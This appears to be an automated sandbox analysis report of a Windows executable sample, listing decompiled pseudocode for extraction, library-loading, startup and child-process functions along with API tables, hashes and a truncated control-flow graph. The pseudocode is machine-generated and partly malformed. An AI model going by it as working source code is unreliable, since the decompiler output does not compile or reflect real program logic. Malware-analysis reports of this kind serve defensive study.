				E00007FF77FF735C42820(_t18, "Failed to extract %s: inflateInit() failed with return code %d!\n", __rdx + 0x12, _t39, _t40, _t41, _t28, _t31, _t34);
				_t11 = _t34 - 1; // -1
				return _t11;
			}













                                                                                                                                                                                                                              0x7ff735c41050
                                                                                                                                                                                                                              0x7ff735c41050
                                                                                                                                                                                                                              0x7ff735c41050
                                                                                                                                                                                                                              0x7ff735c41050
                                                                                                                                                                                                                              0x7ff735c41055
                                                                                                                                                                                                                              0x7ff735c41062
                                                                                                                                                                                                                              0x7ff735c41071
                                                                                                                                                                                                                              0x7ff735c41079
                                                                                                                                                                                                                              0x7ff735c41085
                                                                                                                                                                                                                              0x7ff735c4108a
                                                                                                                                                                                                                              0x7ff735c4108a
                                                                                                                                                                                                                              0x7ff735c4108e
                                                                                                                                                                                                                              0x7ff735c41097
                                                                                                                                                                                                                              0x7ff735c410a1
                                                                                                                                                                                                                              0x7ff735c410a6
                                                                                                                                                                                                                              0x7ff735c410ab
                                                                                                                                                                                                                              0x7ff735c410b1
                                                                                                                                                                                                                              0x7ff735c410bb
                                                                                                                                                                                                                              0x7ff735c410c0
                                                                                                                                                                                                                              0x7ff735c410d2

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: 1.2.11$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2030045667-1060636955
                                                                                                                                                                                                                              • Opcode ID: 85226b6d7eae3e8baa492fa67909730f07b7126df39018fcdcf64e1fd431cda4
                                                                                                                                                                                                                              • Instruction ID: ac0f2aa8bd04f6b93fd0a150ef2370176499266c1e70e1b99a6590e3b2e44b37
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85226b6d7eae3e8baa492fa67909730f07b7126df39018fcdcf64e1fd431cda4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A151C7A3A08693A5EA62BB52D4407B9E2A2FB44F9CFC44131DD8D87785EF3CE505E710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5D448 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                                                              			E00007FF77FF735C5D448(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t37;
				signed long long _t57;
				intOrPtr _t61;
				signed long long _t72;
				signed long long _t75;
				signed long long _t76;
				long long _t82;
				void* _t86;
				signed long long _t90;
				signed long long _t91;
				long _t93;
				void* _t96;
				WCHAR* _t99;
				WCHAR* _t104;

				 *((long long*)(_t86 + 8)) = __rbx;
				 *((long long*)(_t86 + 0x10)) = _t82;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				_push(_t75);
				r15d = __ecx;
				_t90 =  *0x35c7b008; // 0x861d85c91f07
				_t76 = _t75 | 0xffffffff;
				_t72 = _t90 ^  *(0x7ff735c40000 + 0x4af10 + _t104 * 8);
				asm("dec eax");
				if (_t72 == _t76) goto 0x35c5d58e;
				if (_t72 == 0) goto 0x35c5d4b1;
				_t57 = _t72;
				goto 0x35c5d590;
				if (__r8 == __r9) goto 0x35c5d573;
				_t61 =  *((intOrPtr*)(0x7ff735c40000 + 0x4ae70 + __rsi * 8));
				if (_t61 == 0) goto 0x35c5d4d8;
				if (_t61 != _t76) goto 0x35c5d5cd;
				goto 0x35c5d55f;
				r8d = 0x800; // executed
				LoadLibraryW(_t104); // executed
				if (_t57 != 0) goto 0x35c5d5ad;
				if (GetLastError() != 0x57) goto 0x35c5d54d;
				_t14 = _t57 - 0x50; // -80
				_t37 = _t14;
				r8d = _t37;
				if (E00007FF77FF735C5904C(_t90) == 0) goto 0x35c5d54d;
				r8d = _t37;
				if (E00007FF77FF735C5904C(_t90) == 0) goto 0x35c5d54d;
				r8d = 0;
				LoadLibraryExW(_t99, _t96, _t93);
				if (_t57 != 0) goto 0x35c5d5ad;
				 *((intOrPtr*)(0x7ff735c40000 + 0x4ae70 + __rsi * 8)) = _t76;
				if (__r8 + 4 != __r9) goto 0x35c5d4ba;
				_t91 =  *0x35c7b008; // 0x861d85c91f07
				asm("dec eax");
				 *(0x7ff735c40000 + 0x4af10 + _t104 * 8) = _t76 ^ _t91;
				return 0;
			}

















                                                                                                                                                                                                                              0x7ff735c5d448
                                                                                                                                                                                                                              0x7ff735c5d44d
                                                                                                                                                                                                                              0x7ff735c5d452
                                                                                                                                                                                                                              0x7ff735c5d457
                                                                                                                                                                                                                              0x7ff735c5d464
                                                                                                                                                                                                                              0x7ff735c5d47f
                                                                                                                                                                                                                              0x7ff735c5d486
                                                                                                                                                                                                                              0x7ff735c5d490
                                                                                                                                                                                                                              0x7ff735c5d498
                                                                                                                                                                                                                              0x7ff735c5d49e
                                                                                                                                                                                                                              0x7ff735c5d4a7
                                                                                                                                                                                                                              0x7ff735c5d4a9
                                                                                                                                                                                                                              0x7ff735c5d4ac
                                                                                                                                                                                                                              0x7ff735c5d4b4
                                                                                                                                                                                                                              0x7ff735c5d4bd
                                                                                                                                                                                                                              0x7ff735c5d4c8
                                                                                                                                                                                                                              0x7ff735c5d4cd
                                                                                                                                                                                                                              0x7ff735c5d4d3
                                                                                                                                                                                                                              0x7ff735c5d4e5
                                                                                                                                                                                                                              0x7ff735c5d4eb
                                                                                                                                                                                                                              0x7ff735c5d4f7
                                                                                                                                                                                                                              0x7ff735c5d506
                                                                                                                                                                                                                              0x7ff735c5d508
                                                                                                                                                                                                                              0x7ff735c5d508
                                                                                                                                                                                                                              0x7ff735c5d50e
                                                                                                                                                                                                                              0x7ff735c5d51f
                                                                                                                                                                                                                              0x7ff735c5d521
                                                                                                                                                                                                                              0x7ff735c5d535
                                                                                                                                                                                                                              0x7ff735c5d537
                                                                                                                                                                                                                              0x7ff735c5d53f
                                                                                                                                                                                                                              0x7ff735c5d54b
                                                                                                                                                                                                                              0x7ff735c5d557
                                                                                                                                                                                                                              0x7ff735c5d566
                                                                                                                                                                                                                              0x7ff735c5d56c
                                                                                                                                                                                                                              0x7ff735c5d580
                                                                                                                                                                                                                              0x7ff735c5d586
                                                                                                                                                                                                                              0x7ff735c5d5ac

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF735C5D7E6,?,?,-00000018,00007FF735C59872,?,?,?,00007FF735C5976A,?,?,?,00007FF735C54B52), ref: 00007FF735C5D5C7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF735C5D7E6,?,?,-00000018,00007FF735C59872,?,?,?,00007FF735C5976A,?,?,?,00007FF735C54B52), ref: 00007FF735C5D5D3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 71775ab129162233c32de4cf0118e72a1ff9146b3ecac6b54ad7a971ee12d98f
                                                                                                                                                                                                                              • Instruction ID: f89352427053a39d59aefd410eb470d742f0772cc64f80d9161e0ebe36cfff97
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71775ab129162233c32de4cf0118e72a1ff9146b3ecac6b54ad7a971ee12d98f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1541F2E3B19703A1FA02AB56A8142B5E3A1BF45FA8FC94935DD1C4B744EE3CE144E320
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C46A20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93processsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              C-Code - Quality: 43%
                                                                                                                                                                                                                              			E00007FF77FF735C46A20(void* __rax, long long __rbx, void* __rcx, long long _a16, short _a24, intOrPtr _a32, long long _a40, long long _a48, long long _a56, long long _a64, intOrPtr _a72, char _a80, long long _a88, short _a96, char _a104, char _a136, long long _a144, intOrPtr _a196, short _a200, signed long long _a216, signed long long _a224, signed long long _a232, char _a248, signed int _a8440, void* _a8480) {
				void* __rdi;
				int _t53;
				signed long long _t80;
				signed long long _t81;
				long long _t102;
				void* _t103;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;

				_t84 = __rbx;
				_a16 = __rbx;
				E00007FF77FF735C4A3B0(0x2110, __rax, _t110, _t111);
				_t105 = _t104 - __rax;
				_t80 =  *0x35c7b008; // 0x861d85c91f07
				_t81 = _t80 ^ _t104 - __rax;
				_a8440 = _t81;
				_t98 = __rcx;
				_a72 = 0;
				r8d = 0x1000;
				E00007FF77FF735C47250(_t81, __rbx,  &_a248, __rcx, _t103, _t107);
				_t5 = _t102 + 0x16; // 0x16
				E00007FF77FF735C5699C(_t5, _t84, _t98, _t102, _t112);
				_t6 = _t102 + 2; // 0x2, executed
				E00007FF77FF735C5699C(_t6, _t84, _t98, _t102, _t112); // executed
				_t7 = _t102 + 0xf; // 0xf
				E00007FF77FF735C5699C(_t7, _t84, _t98, _t102, _t112);
				_t8 = _t102 + 0x15; // 0x15
				E00007FF77FF735C5699C(_t8, _t84, _t98, _t102, _t112);
				_a80 = 0x18;
				_a88 = _t102;
				_a96 = 1;
				GetStartupInfoW(??);
				asm("xorps xmm0, xmm0");
				_a144 = _t102;
				asm("movdqa [esp+0xa0], xmm0");
				_a196 = 0x101;
				_a200 = 1;
				E00007FF77FF735C53950(0, _t81);
				E00007FF77FF735C56534(E00007FF77FF735C587E4(_t81, _t81), _t81);
				_a216 = _t81;
				E00007FF77FF735C53950(1, _t81);
				E00007FF77FF735C56534(E00007FF77FF735C587E4(_t81, _t81), _t81);
				_t17 = _t102 + 2; // 0x2
				_a224 = _t81;
				E00007FF77FF735C53950(_t17, _t81);
				E00007FF77FF735C56534(E00007FF77FF735C587E4(_t81, _t81), _t81);
				_a232 = _t81;
				GetCommandLineW();
				r9d = 0;
				_a64 =  &_a104;
				_a56 =  &_a136;
				_a48 = _t102;
				_a40 = _t102;
				_a32 = 0;
				_a24 = 1;
				_t53 = CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
				if (_t53 == 0) goto 0x35c46ba1;
				WaitForSingleObject(??, ??);
				GetExitCodeProcess(??, ??); // executed
				goto 0x35c46bb9;
				E00007FF77FF735C426D0(_t53,  &_a136, "CreateProcessW", "Error creating child process!\n",  &_a80, _t109);
				return E00007FF77FF735C4A410(0xffffffff, _t50, _a8440 ^ _t105);
			}















                                                                                                                                                                                                                              0x7ff735c46a20
                                                                                                                                                                                                                              0x7ff735c46a20
                                                                                                                                                                                                                              0x7ff735c46a2b
                                                                                                                                                                                                                              0x7ff735c46a30
                                                                                                                                                                                                                              0x7ff735c46a33
                                                                                                                                                                                                                              0x7ff735c46a3a
                                                                                                                                                                                                                              0x7ff735c46a3d
                                                                                                                                                                                                                              0x7ff735c46a45
                                                                                                                                                                                                                              0x7ff735c46a52
                                                                                                                                                                                                                              0x7ff735c46a56
                                                                                                                                                                                                                              0x7ff735c46a5c
                                                                                                                                                                                                                              0x7ff735c46a66
                                                                                                                                                                                                                              0x7ff735c46a6b
                                                                                                                                                                                                                              0x7ff735c46a72
                                                                                                                                                                                                                              0x7ff735c46a75
                                                                                                                                                                                                                              0x7ff735c46a7c
                                                                                                                                                                                                                              0x7ff735c46a7f
                                                                                                                                                                                                                              0x7ff735c46a86
                                                                                                                                                                                                                              0x7ff735c46a89
                                                                                                                                                                                                                              0x7ff735c46a96
                                                                                                                                                                                                                              0x7ff735c46a9e
                                                                                                                                                                                                                              0x7ff735c46aa3
                                                                                                                                                                                                                              0x7ff735c46aa7
                                                                                                                                                                                                                              0x7ff735c46aad
                                                                                                                                                                                                                              0x7ff735c46ab0
                                                                                                                                                                                                                              0x7ff735c46aba
                                                                                                                                                                                                                              0x7ff735c46ac3
                                                                                                                                                                                                                              0x7ff735c46ace
                                                                                                                                                                                                                              0x7ff735c46ad6
                                                                                                                                                                                                                              0x7ff735c46ae5
                                                                                                                                                                                                                              0x7ff735c46aec
                                                                                                                                                                                                                              0x7ff735c46af4
                                                                                                                                                                                                                              0x7ff735c46b03
                                                                                                                                                                                                                              0x7ff735c46b08
                                                                                                                                                                                                                              0x7ff735c46b0b
                                                                                                                                                                                                                              0x7ff735c46b13
                                                                                                                                                                                                                              0x7ff735c46b22
                                                                                                                                                                                                                              0x7ff735c46b27
                                                                                                                                                                                                                              0x7ff735c46b2f
                                                                                                                                                                                                                              0x7ff735c46b35
                                                                                                                                                                                                                              0x7ff735c46b4d
                                                                                                                                                                                                                              0x7ff735c46b5a
                                                                                                                                                                                                                              0x7ff735c46b5f
                                                                                                                                                                                                                              0x7ff735c46b64
                                                                                                                                                                                                                              0x7ff735c46b69
                                                                                                                                                                                                                              0x7ff735c46b6d
                                                                                                                                                                                                                              0x7ff735c46b71
                                                                                                                                                                                                                              0x7ff735c46b79
                                                                                                                                                                                                                              0x7ff735c46b85
                                                                                                                                                                                                                              0x7ff735c46b95
                                                                                                                                                                                                                              0x7ff735c46b9f
                                                                                                                                                                                                                              0x7ff735c46baf
                                                                                                                                                                                                                              0x7ff735c46bd9

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C47250: MultiByteToWideChar.KERNEL32 ref: 00007FF735C4728A
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C5699C: SetConsoleCtrlHandler.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF735C58884), ref: 00007FF735C56A09
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C5699C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF735C58884), ref: 00007FF735C56A1C
                                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32 ref: 00007FF735C46AA7
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C587E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF735C587F8
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C56534: _invalid_parameter_noinfo.LIBCMT ref: 00007FF735C5659B
                                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00007FF735C46B2F
                                                                                                                                                                                                                              • CreateProcessW.KERNELBASE ref: 00007FF735C46B71
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32 ref: 00007FF735C46B85
                                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE ref: 00007FF735C46B95
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                              • API String ID: 1742298069-3524285272
                                                                                                                                                                                                                              • Opcode ID: 261be9aaa932670a69403cc6c2372e3e588cf4cd20e73d9325df3dadc5b33467
                                                                                                                                                                                                                              • Instruction ID: c3ed36018aed0cbd0c1e4333d550d92cdc7256241db19669b1338c7f4a242bb8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 261be9aaa932670a69403cc6c2372e3e588cf4cd20e73d9325df3dadc5b33467
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D416F73A0868392DB10EB61E4552BAF3A0FB94B48F900535E68D07B9ADF7CE194DB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4A514 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                                                              			E00007FF77FF735C4A514(intOrPtr* __rax, long long __rbx, void* __r8, long long _a8) {
				char _v24;
				void* _t8;
				void* _t9;
				void* _t10;
				signed short _t20;
				void* _t22;
				void* _t26;
				intOrPtr _t35;
				intOrPtr* _t54;
				intOrPtr* _t55;

				_t56 = __rbx;
				_t54 = __rax;
				_a8 = __rbx;
				_t8 = E00007FF77FF735C4A974(1); // executed
				if (_t8 == 0) goto 0x35c4a660;
				dil = 0;
				_v24 = dil;
				_t9 = E00007FF77FF735C4A938();
				_t35 =  *0x35c8a540; // 0x2
				if (_t35 == 1) goto 0x35c4a66b;
				if (_t35 != 0) goto 0x35c4a59c;
				 *0x35c8a540 = 1;
				_t10 = E00007FF77FF735C57C74(__rbx, 0x35c69458, 0x35c69498); // executed
				if (_t10 == 0) goto 0x35c4a57d;
				goto 0x35c4a655;
				E00007FF77FF735C57C30(_t56, 0x35c69440, 0x35c69450); // executed
				 *0x35c8a540 = 2;
				goto 0x35c4a5a4;
				dil = 1;
				_v24 = dil;
				E00007FF77FF735C4AC88(E00007FF77FF735C4AAE4(_t9, 0x35c69450));
				if ( *_t54 == 0) goto 0x35c4a5d7;
				if (E00007FF77FF735C4AA4C(_t54, _t54) == 0) goto 0x35c4a5d7;
				r8d = 0;
				_t55 =  *_t54;
				E00007FF77FF735C4AC90( *0x35c69428());
				if ( *_t55 == 0) goto 0x35c4a5f9;
				if (E00007FF77FF735C4AA4C(_t55, _t55) == 0) goto 0x35c4a5f9;
				E00007FF77FF735C57F90( *_t55);
				_t20 = E00007FF77FF735C4ADEC(0x35c69450);
				E00007FF77FF735C57BDC();
				r9d = _t20 & 0x0000ffff;
				_t72 = _t55;
				_t22 = E00007FF77FF735C41000(_t55); // executed
				if (E00007FF77FF735C4AE30(_t55) == 0) goto 0x35c4a675;
				if (dil != 0) goto 0x35c4a62f;
				E00007FF77FF735C57F74(0x7ff735c40000, 0x35c69450, _t55);
				E00007FF77FF735C4AB08(1, 0);
				_t26 = _t22;
				if (E00007FF77FF735C4AE30(_t55) == 0) goto 0x35c4a67d;
				if (_v24 != 0) goto 0x35c4a653;
				E00007FF77FF735C57F64(0x7ff735c40000, 0x35c69450, _t72);
				return _t26;
			}













                                                                                                                                                                                                                              0x7ff735c4a514
                                                                                                                                                                                                                              0x7ff735c4a514
                                                                                                                                                                                                                              0x7ff735c4a514
                                                                                                                                                                                                                              0x7ff735c4a523
                                                                                                                                                                                                                              0x7ff735c4a52a
                                                                                                                                                                                                                              0x7ff735c4a530
                                                                                                                                                                                                                              0x7ff735c4a533
                                                                                                                                                                                                                              0x7ff735c4a538
                                                                                                                                                                                                                              0x7ff735c4a53f
                                                                                                                                                                                                                              0x7ff735c4a548
                                                                                                                                                                                                                              0x7ff735c4a550
                                                                                                                                                                                                                              0x7ff735c4a552
                                                                                                                                                                                                                              0x7ff735c4a56a
                                                                                                                                                                                                                              0x7ff735c4a571
                                                                                                                                                                                                                              0x7ff735c4a578
                                                                                                                                                                                                                              0x7ff735c4a58b
                                                                                                                                                                                                                              0x7ff735c4a590
                                                                                                                                                                                                                              0x7ff735c4a59a
                                                                                                                                                                                                                              0x7ff735c4a59c
                                                                                                                                                                                                                              0x7ff735c4a59f
                                                                                                                                                                                                                              0x7ff735c4a5ab
                                                                                                                                                                                                                              0x7ff735c4a5b7
                                                                                                                                                                                                                              0x7ff735c4a5c3
                                                                                                                                                                                                                              0x7ff735c4a5c5
                                                                                                                                                                                                                              0x7ff735c4a5ce
                                                                                                                                                                                                                              0x7ff735c4a5d7
                                                                                                                                                                                                                              0x7ff735c4a5e3
                                                                                                                                                                                                                              0x7ff735c4a5ef
                                                                                                                                                                                                                              0x7ff735c4a5f4
                                                                                                                                                                                                                              0x7ff735c4a5f9
                                                                                                                                                                                                                              0x7ff735c4a601
                                                                                                                                                                                                                              0x7ff735c4a606
                                                                                                                                                                                                                              0x7ff735c4a609
                                                                                                                                                                                                                              0x7ff735c4a615
                                                                                                                                                                                                                              0x7ff735c4a623
                                                                                                                                                                                                                              0x7ff735c4a628
                                                                                                                                                                                                                              0x7ff735c4a62a
                                                                                                                                                                                                                              0x7ff735c4a633
                                                                                                                                                                                                                              0x7ff735c4a638
                                                                                                                                                                                                                              0x7ff735c4a645
                                                                                                                                                                                                                              0x7ff735c4a64c
                                                                                                                                                                                                                              0x7ff735c4a64e
                                                                                                                                                                                                                              0x7ff735c4a65f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4144305933-0
                                                                                                                                                                                                                              • Opcode ID: 7b4cdaef392bfe4ef6db09c38f43db147d797bdba43bbb4734d1b7cec9a8046f
                                                                                                                                                                                                                              • Instruction ID: 3912c11bb00ab704db794ef7c68567d2ba8278d509fefd6ae125e5656bd78bf4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b4cdaef392bfe4ef6db09c38f43db147d797bdba43bbb4734d1b7cec9a8046f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91316D93E0856366FA56BB659912BB9E393AF40F8CFC44534ED0D472D3DE2CA444A230
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C41000 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 217COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1035 7ff735c41000-7ff735c435c9 call 7ff735c4e340 call 7ff735c4e338 call 7ff735c46f20 call 7ff735c4e338 call 7ff735c4a3b0 call 7ff735c53950 call 7ff735c545ec call 7ff735c41ba0 1053 7ff735c4367d 1035->1053 1054 7ff735c435cf-7ff735c435de call 7ff735c439f0 1035->1054 1055 7ff735c43682-7ff735c436a7 call 7ff735c4a410 1053->1055 1054->1053 1059 7ff735c435e4-7ff735c435f7 call 7ff735c438c0 1054->1059 1059->1053 1063 7ff735c435fd-7ff735c43610 call 7ff735c43970 1059->1063 1063->1053 1066 7ff735c43612-7ff735c4364b call 7ff735c46440 call 7ff735c469e0 call 7ff735c41a80 1063->1066 1073 7ff735c436a8-7ff735c436b9 1066->1073 1074 7ff735c4364d-7ff735c43663 call 7ff735c41a80 1066->1074 1075 7ff735c436ce-7ff735c436e6 call 7ff735c47250 1073->1075 1076 7ff735c436bb-7ff735c436c5 call 7ff735c43100 1073->1076 1074->1073 1081 7ff735c43665-7ff735c43678 call 7ff735c42820 1074->1081 1087 7ff735c436e8-7ff735c436f4 call 7ff735c42820 1075->1087 1088 7ff735c436f6-7ff735c436fd SetDllDirectoryW 1075->1088 1085 7ff735c436c7 1076->1085 1086 7ff735c43703-7ff735c43710 call 7ff735c45960 1076->1086 1081->1053 1085->1075 1093 7ff735c4375e-7ff735c43763 call 7ff735c458e0 1086->1093 1094 7ff735c43712-7ff735c43722 call 7ff735c45640 1086->1094 1087->1053 1088->1086 1097 7ff735c43768-7ff735c4376b 1093->1097 1094->1093 1101 7ff735c43724-7ff735c43733 call 7ff735c451f0 1094->1101 1099 7ff735c43771-7ff735c4377e 1097->1099 1100 7ff735c43816-7ff735c43825 call 7ff735c42f90 1097->1100 1102 7ff735c43780-7ff735c4378a 1099->1102 1100->1053 1113 7ff735c4382b-7ff735c43862 call 7ff735c46970 call 7ff735c46440 call 7ff735c44fe0 1100->1113 1111 7ff735c43735-7ff735c43741 call 7ff735c45180 1101->1111 1112 7ff735c43754-7ff735c43759 call 7ff735c45460 1101->1112 1105 7ff735c4378c-7ff735c43791 1102->1105 1106 7ff735c43793-7ff735c43795 1102->1106 1105->1102 1105->1106 1109 7ff735c43797-7ff735c437ba call 7ff735c41be0 1106->1109 1110 7ff735c437e1-7ff735c43811 call 7ff735c430f0 call 7ff735c42f30 call 7ff735c430e0 call 7ff735c45460 call 7ff735c458e0 1106->1110 1109->1053 1125 7ff735c437c0-7ff735c437ca 1109->1125 1110->1055 1111->1112 1126 7ff735c43743-7ff735c43752 call 7ff735c457f0 1111->1126 1112->1093 1113->1053 1136 7ff735c43868-7ff735c4389d call 7ff735c430f0 call 7ff735c46a20 call 7ff735c45460 call 7ff735c458e0 1113->1136 1129 7ff735c437d0-7ff735c437df 1125->1129 1126->1097 1129->1110 1129->1129 1149 7ff735c438a7-7ff735c438aa call 